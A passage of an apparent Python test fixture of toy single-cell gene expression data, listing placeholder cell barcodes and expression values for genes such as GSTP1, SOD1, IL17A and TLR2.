"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"F2 Expression": {
"name": "F2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.58,
2.0,
2.0,
2.58,
1.0,
2.32,
2.58,
1.0,
2.58,
2.81,
1.58,
2.32,
1.0,
2.32,
1.58,
1.0,
2.0,
3.0,
2.32,
1.0,
1.0,
1.0,
1.0,
1.0,
2.58,
1.58,
1.58,
2.58,
3.0,
2.32,
1.58,
2.58,
1.0,
1.0,
3.0,
2.0,
1.0,
3.0,
2.32,
2.81,
1.0,
2.32,
1.0,
1.0,
2.58,
2.58,
1.58,
2.58,
2.81,
3.0,
2.0,
2.58,
1.0,
2.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTP1 Cells": {
"name": "GSTP1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTP1 Expression": {
"name": "GSTP1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.0,
1.58,
2.81,
1.58,
1.58,
1.0,
2.32,
1.0,
3.0,
3.0,
2.0,
2.58,
2.0,
2.81,
1.0,
2.32,
2.32,
3.0,
2.81,
2.32,
2.32,
2.32,
3.0,
2.58,
2.0,
2.32,
3.0,
2.81,
3.0,
2.81,
2.58,
2.58,
2.32,
3.0,
2.58,
2.32,
1.58,
2.81,
2.0,
2.81,
2.58,
1.58,
2.32,
2.32,
2.81,
3.0,
3.0,
1.58,
2.81,
2.58,
3.0,
2.58,
2.58,
2.0,
1.0,
2.0,
2.32,
1.0,
3.0,
3.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PIK3CA Cells": {
"name": "PIK3CA Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PIK3CA Expression": {
"name": "PIK3CA Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
1.0,
1.0,
2.58,
3.0,
2.81,
1.58,
2.32,
1.0,
3.0,
3.0,
2.32,
2.0,
2.0,
2.58,
2.0,
2.32,
2.0,
2.0,
2.58,
3.0,
2.81,
2.0,
1.58,
2.58,
2.0,
2.58,
2.32,
2.81,
2.81,
3.0,
3.0,
3.0,
2.81,
2.0,
1.58,
1.0,
2.32,
2.0,
2.32,
1.58,
1.58,
3.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SOD1 Cells": {
"name": "SOD1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SOD1 Expression": {
"name": "SOD1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
2.32,
1.58,
2.81,
2.81,
2.58,
1.58,
2.58,
2.58,
1.0,
1.58,
1.58,
1.58,
3.0,
3.0,
1.58,
1.0,
1.58,
1.58,
2.81,
2.58,
1.0,
2.81,
2.0,
2.81,
2.58,
2.81,
1.58,
2.58,
1.0,
3.0,
1.0,
3.0,
3.0,
2.81,
2.32,
1.58,
3.0,
2.32,
1.0,
2.58,
3.0,
2.0,
2.81,
2.32,
2.81,
2.58,
2.58,
2.0,
2.0,
2.81,
1.58,
3.0,
3.0,
2.32,
1.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL17A Cells": {
"name": "IL17A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL17A Expression": {
"name": "IL17A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.81,
2.0,
2.58,
1.0,
1.0,
2.0,
3.0,
2.81,
1.58,
1.58,
2.32,
2.81,
1.58,
1.58,
3.0,
2.0,
2.32,
2.81,
2.32,
2.0,
1.0,
1.58,
1.0,
2.58,
3.0,
2.32,
1.0,
2.81,
2.58,
2.81,
2.58,
1.0,
1.58,
2.81,
2.81,
2.81,
2.32,
2.58,
1.58,
1.58,
3.0,
1.58,
2.0,
1.58,
2.81,
1.58,
2.32,
3.0,
2.81,
2.0,
2.58,
2.0,
2.32,
2.58,
2.58,
1.58,
2.0,
2.0,
2.81,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-A Cells": {
"name": "HLA-A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-A Expression": {
"name": "HLA-A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.32,
2.58,
3.0,
1.58,
2.81,
2.32,
2.32,
1.58,
2.32,
1.58,
1.58,
1.0,
2.58,
2.0,
2.32,
2.81,
2.58,
3.0,
1.58,
1.58,
2.81,
1.0,
2.58,
2.0,
3.0,
3.0,
1.58,
1.58,
2.32,
2.81,
2.58,
2.58,
3.0,
2.81,
2.81,
2.81,
2.58,
1.58,
2.58,
3.0,
1.0,
2.0,
3.0,
2.0,
3.0,
2.32,
2.58,
2.58,
1.58,
1.0,
2.0,
1.0,
1.0,
3.0,
2.0,
2.81,
2.32,
2.81,
2.81,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TLR2 Cells": {
"name": "TLR2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
